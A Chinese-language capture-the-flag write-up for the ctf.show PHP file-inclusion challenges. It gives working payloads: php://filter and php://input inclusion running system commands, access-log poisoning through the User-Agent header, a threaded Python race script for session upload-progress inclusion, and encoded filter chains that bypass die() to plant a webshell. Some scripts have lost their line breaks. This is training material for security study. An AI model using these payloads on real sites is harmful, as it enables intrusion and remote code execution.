文件包含篇

web78

第一題filter偽協議直接讀源碼即可
?file=php://filter/convert.base64-encode/resource=flag.php

web79

flag.php的php無法用大小寫繞過，所以用Php://input只讀流

import requests
url = "http://fadb524a-f22d-4747-a35c-82f71e84bba7.challenge.ctf.show/?file=pHp://input"
payload = "<?php system('tac flag.php'); ?>"
# 構造請求頭，確保 PHP 能正確解析 php://input
headers = {"Content-Type": "application/x-www-form-urlencoded"
}
response = requests.post(url, data=payload, headers=headers)
print( response.text)

web80

依然是上題的方法，不過flag的文件名變了，我還以為是flag.php所以沒去ls導致用了點時間去排查！

web81

用日志包含

import requestsurl = "http://e1891a4b-af44-4673-a82d-8e53b6bd2f0f.challenge.ctf.show/?file=/var/log/nginx/access.log"
headers = {"User-Agent": "<?php system('tac fl0g.php');?>"
}
response = requests.get(url, headers=headers)
print( response.text)

但是這里要第二次運行才可以得到想要的結果，因為你第一次訪問的時候你要的東西還沒在日志文件里面！

web82

點被過濾了就只能打session包含了
先上傳個表單，然后里面有個<input type=“hidden” name=“PHP_SESSION_UPLOAD_PROGRESS” value=“unique_identifier”>關鍵就在于這的name，命令就寫在value里面

session.upload_progress.name=“PHP_SESSION_UPLOAD_PROGRESS”,這里的post前端表單上傳與name同名變量就可以獲得上傳進度

然后就是上傳于讀取的競爭了
在這里插入圖片描述
讀取

web83—web86

依舊是session包含

import io
import requests
import threadingsessid="flag"
url="http://819302a9-0426-4a8c-82bf-8bb5fc2343e1.challenge.ctf.show/"def write(session):while event.is_set():f=io.BytesIO(b'a'*1024*50)r=session.post(url=url,cookies={'PHPSESSID':sessid},data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('tac fl0g.php');?>"},files={"file":('feii.txt',f)})def read(session):while event.is_set():payload="?file=/tmp/sess_"+sessidr=session.get(url=url+payload)if 'feii.txt' in r.text:print("[+] 成功寫入！響應：")print(r.text)event.clear()else :print("[-] 繼續嘗試...")if __name__=='__main__':event=threading.Event()event.set()with requests.session() as sess:for i in range(1,30):threading.Thread(target=write,args=(sess,)).start()for i in range(1,30):threading.Thread(target=read,args=(sess,)).start()

web87

這道題是寫入文件，但是你可控的東西在死亡函數之后，因此需要繞過死亡！
方法一：base64編碼

file：
？file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%33%31%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
post：content=aaPD9waHAgcGhwaW5mbygpOw==

要寫什么自己定（當然直接寫馬是最好的），我這文件名是111.php，寫的是phpinfo()，還有就是前面加aa是為了將前面的6的湊成4的倍數，因為base64解碼時四個字節一組
方法二：rot13編碼（原理是一樣的）

?file=php://filter/write=string.rot13/resource=shell.php
content寫馬就行

但是它只適用于短標簽未開啟的情況，因為<?php die('大佬別秀了');?>的rot13解碼是<?cuc qvr('大佬別秀了');?>如果短標簽開啟了就會錯誤！

web88

data://協議可打！

web116

web部分
在這里插入圖片描述
那這就簡單了，不就是任意文件讀取了嗎？直接?file=flag.php然后在響應里面找到flag的base64編碼，解碼即可！

web117

用其他編碼繞過死亡

php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php

str = "<?=system('tac f*');"
str_encoded = ''
for i in range(len(str)):if i % 2 == 1:str_encoded += str[i]str_encoded += str[i-1]
print(str_encoded) 		# ?<s=syet(mt'caf '*;)

end！在這里插入圖片描述

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/bicheng/92232.shtml
繁體地址，請注明出處：http://hk.pswp.cn/bicheng/92232.shtml
英文地址，請注明出處：http://en.pswp.cn/bicheng/92232.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！